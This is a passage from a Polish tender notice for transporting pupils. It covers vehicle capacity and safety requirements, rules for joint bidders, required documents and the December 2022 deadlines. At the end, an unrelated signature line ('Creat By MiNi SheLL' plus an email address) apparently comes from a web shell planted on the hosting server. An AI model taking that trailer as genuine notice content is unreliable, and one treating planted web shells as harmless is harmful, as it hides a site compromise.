będzie dysponować potencjałem technicznym, czyli środkami transportu sprawnymi technicznie, na poszczególnych trasach, do przewozu co najmniej następującej liczby osób:<br/>-TRASA 1: środek transportu zapewniający przewóz 50 uczniów oraz kierowcy i opiekuna, <br/>- TRASA 2: środek transportu zapewniający przewóz 46 uczniów oraz kierowcy i opiekuna, <br/>-TRASA 3: środek transportu zapewniający przewóz 50 uczniów oraz kierowcy i opiekuna, <br/>- TRASA 4: środek transportu zapewniający przewóz 31 uczniów oraz kierowcy i opiekuna.<br/>UWAGA!<br/>Wykonawca zobowiązany jest zapewnić by kierujący pojazdem wykonującym przewóz spełniał wymagania określone w art. 39a ustawy o transporcie drogowym. Uczniowie winni mieć zapewnione miejsca siedzące. Wykonawca zobligowany jest do przedstawienia jednego pojazdu na każdej trasie. Zamawiający nie dopuszcza wskazania tego samego pojazdu do więcej niż jednej trasy. W Załączniku Nr 8 do SWZ należy podać nazwę producenta pojazdu, model, rok produkcji, podstawę dysponowania pojazdem oraz liczbę miejsc siedzących – na podstawie dowodu rejestracyjnego.<br/>Każdy pojazd musi spełniać następujące wymagania:<br/>-posiadać dowody rejestracyjne pojazdu wraz z opłaconymi ubezpieczeniami – polisami OC, <br/>-być wyposażony w pasy bezpieczeństwa zgodnie z wyposażeniem fabrycznym bądź homologacją pojazdu,<br/>-posiadać ważne badania diagnostyczne,<br/>-mieć odpowiednie oznakowanie pojazdu,<br/>-spełniać odpowiednie warunki bhp i warunki higieniczne (niezbędne wyposażenie to m.in.: gaśnice przeciwpożarowe z aktualnym badaniem oraz młoteczki do ewentualnego rozbicia szyb umieszczone w widocznych miejscach),<br/>-posiadać sprawne ogrzewanie (bezwzględnie wymagane w miesiącach, gdy panują niższe temperatury).<br/>2.	Mając na uwadze art. 117 ustawy Zamawiający zastrzega, że:<br/>1) odnośnie warunku określonego w ust. 2 pkt. 2 lit. a - spełnienie tego warunku powinien wykazać Wykonawca, który będzie realizował dowóz dzieci; w przypadku gdy Wykonawcy będą wspólnie realizowali przedmiot zamówienia wówczas każdy z nich powinien wykazać spełnienie przedmiotowego warunku (wyjątkiem może być sytuacja, w której np. Wykonawcy będą wspólnie realizować przedmiot zamówienia w ramach prowadzonej wspólnie działalności m.in. spółki cywilne; wówczas mogą wykazać, że łącznie spełniają przedmiotowy warunek – uprawnienia do prowadzenia określonej działalności gospodarczej lub zawodowej wystawione na podmiot/y wspólnie ubiegający się o udzielenie zamówienia i/lub realizujący/ce przedmiot zamówienia);<br/>2)	odnośnie warunku w ust. 2 pkt. 4 lit. a - spełnienie tego warunku powinien wykazać Wykonawca, który będzie realizował dowóz dzieci; w przypadku gdy Wykonawcy będą wspólnie realizowali przedmiot zamówienia wówczas każdy z nich powinien wykazać spełnienie przedmiotowego warunku (wyjątkiem może być sytuacja, w której np. Wykonawcy będą wspólnie realizować przedmiot zamówienia w ramach prowadzonej wspólnie działalności m.in. spółki cywilne, konsorcja; wówczas mogą wykazać, że łącznie spełniają przedmiotowy warunek – doświadczenie zdobyte/zdobywane przez podmiot/y wspólnie ubiegające się o udzielenie zamówienia i/lub realizujący/ce przedmiot zamówienia);<br/>3)	odnośnie warunku określonego w ust. 2 pkt. 4 lit. b – co najmniej jeden z Wykonawców powinien wykazać jego spełnienie; Wykonawcy mogą również wykazać, że łącznie spełniają przedmiotowy warunek; <br/>4)	odnośnie warunku określonego w ust. 2 pkt. 4 lit. c – co najmniej jeden z Wykonawców powinien wykazać jego spełnienie; Wykonawcy mogą również wykazać, że łącznie spełniają przedmiotowy warunek. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">W celu potwierdzenia braku podstaw do wykluczenia:<br/>a)	Oświadczenie Wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16 lutego 2007 roku o ochronie konkurencji i konsumentów (Dz.U. z 2021 r. poz.275), z innym Wykonawcą, który złożył odrębną ofertę, ofertę częściową lub wniosek o dopuszczenie do udziału w postępowaniu, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału w postępowaniu niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej – Załącznik Nr 4 do SWZ.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1. Zamawiający wezwie Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie (nie krótszym niż 5 dni od dnia wezwania) następujących podmiotowych środków dowodowych (aktualnych na dzień złożenia):<br/>1)	W celu potwierdzenia spełniania warunków udziału w postępowaniu:<br/>a)	aktualną licencję zezwalającą na wykonywanie krajowego transportu drogowego osób lub aktualne zezwolenie na wykonywanie zawodu przewoźnika drogowego, zgodnie z ustawą z dnia 6 września 2001 r. o transporcie drogowym;<br/>b)	wykaz usług wykonanych, a w przypadku świadczeń powtarzających się lub ciągłych również wykonywanych, w okresie ostatnich trzech lat (przed upływem terminu składania ofert), a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane lub są wykonywane, oraz załączeniem dowodów określających, czy te usługi zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego usługi zostały wykonane, a w przypadku świadczeń powtarzających się lub ciągłych są wykonywane, a jeżeli Wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – oświadczenie Wykonawcy; w przypadku świadczeń powtarzających się lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wystawione w okresie ostatnich 3 miesięcy; wg wzoru stanowiącego Załącznik Nr 6 do SWZ;<br/>c)	wykaz osób, skierowanych przez Wykonawcę do realizacji zamówienia publicznego,<br/>w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją <br/>o podstawie do dysponowania tymi osobami. Wg wzoru stanowiącego Załącznik Nr 7 do SWZ;<br/>d)	wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych (pojazdy) dostępnych Wykonawcy w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami, wg Załącznika Nr 8 do SWZ</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Do oferty należy dołączyć:<br/>1)	Oświadczenia wstępne Wykonawcy wg wzoru stanowiącego Załącznik Nr 5 do SWZ. <br/>W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, oświadczenie wstępne składa każdy z Wykonawców;<br/>2)	Pełnomocnictwo upoważniające do złożenia oferty, o ile ofertę składa pełnomocnik;<br/>3)	Pełnomocnictwo dla pełnomocnika do reprezentowania w postępowaniu Wykonawców wspólnie ubiegających się o udzielenie zamówienia - dotyczy ofert składanych przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia;<br/>4)	Wykonawca, który polega na zdolnościach lub sytuacji podmiotów udostępniających zasoby, składa, wraz z ofertą, zobowiązanie podmiotu udostępniającego zasoby do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji danego zamówienia - wg wzoru stanowiącego Załącznik Nr 9 do SWZ. W załączniku Wykonawca składa również oświadczenie podmiotu udostępniającego zasoby, potwierdzające brak podstaw wykluczenia tego podmiotu oraz odpowiednio spełnianie warunków udziału w postępowaniu w zakresie, w jakim Wykonawca powołuje się na jego zasoby. <br/>5)	Oświadczenie Wykonawców wspólnie ubiegających się o udzielenie zamówienia – wg wzoru stanowiącego Załącznik Nr 5 do SWZ. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia.<br/>2.	W przypadku, o którym mowa w ust. 1 oświadczenie, o którym mowa w Rozdziale VIII ust. 1 składa z ofertą każdy z Wykonawców wspólnie ubiegających się o zamówienie.<br/>3.	W przypadku, o którym mowa w ust 1, Wykonawcy ustanawiają Pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania <br/>w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.<br/>4.	Zaleca się, aby Pełnomocnikiem był jeden z Wykonawców wspólnie ubiegających się <br/>o udzielenie zamówienia. Wszelka korespondencja prowadzona będzie wyłącznie <br/>z Pełnomocnikiem.<br/>5.	W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia Wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z Wykonawców, którzy wykonają usługi, do realizacji których te zdolności są wymagane. W takim przypadku Wykonawcy wspólnie ubiegający się o udzielenie zamówienia wskazują w treści oświadczenia stanowiącego Załącznik Nr 5 do SWZ, które usługi wykonają poszczególni Wykonawcy.<br/>6.	Warunek w zakresie doświadczenia, dotyczący zdolności technicznej lub zawodowej musi potwierdzać co najmniej jeden z Wykonawców wspólnie ubiegających się o udzielenie zamówienia.<br/>7.	Oferta musi być podpisana w taki sposób, by poprawnie zobowiązywała wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia.<br/>8.	Jeżeli w postępowaniu zostanie wybrana oferta Wykonawców wspólnie ubiegających się <br/>o udzielenie zamówienia, Zamawiający może żądać przed zawarciem umowy w sprawie zamówienia publicznego, kopii umowy regulującej współpracę tych Wykonawców.<br/>9.	Zamawiający nie zastrzega obowiązku osobistego wykonania, przez poszczególnych Wykonawców wspólnie ubiegających się o udzielenie zamówienia, kluczowych zadań dotyczących zamówień na usługi.<br/>10.	Przepisy dotyczące Wykonawcy stosuje się odpowiednio do Wykonawców wspólnie ubiegających się o udzielenie zamówienia.<br/>11.	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia, ponoszą solidarną odpowiedzialność za wykonanie umowy i wniesienie zabezpieczenia należytego wykonania umowy.<br/>12.	Wypełniając formularz oferty należy wpisać dane (nazwa, adres itd.) Pełnomocnika (Lidera) oraz wszystkich Wykonawców wspólnie ubiegających się o zamówienie. W innych dokumentach (załączniki) powołujących się na Wykonawcę w miejscu np. nazwa, adres Wykonawcy, należy wpisać dane dotyczące Pełnomocnika (Lidera) i Wykonawcy, którego dany dokument (załącznik) dotyczy. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Rodzaj i zakres zmian umowy określone są w załączniku nr 2 do SWZ - projektowanych postanowieniach umowy <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-12-02 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę należy złożyć za pośrednictwem „Formularza do złożenia, zmiany, wycofania oferty lub wniosku” dostępnego na ePUAP i udostępnionego również na miniPortalu.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-12-02 09:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-12-23</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Termin wykonania zamówienia został określony w zakresie dat, ze względu na rodzaj i specyfikę zamówienia, dotyczącą dowozu uczniów. W związku z powyższym zamówienie będzie realizowane wyłącznie w dni nauki szkolnej. Zamawiający nie miał możliwości określenia terminu wykonania zamówienia w inny sposób.

Creat By MiNi SheLL
Email: jattceo@gmail.com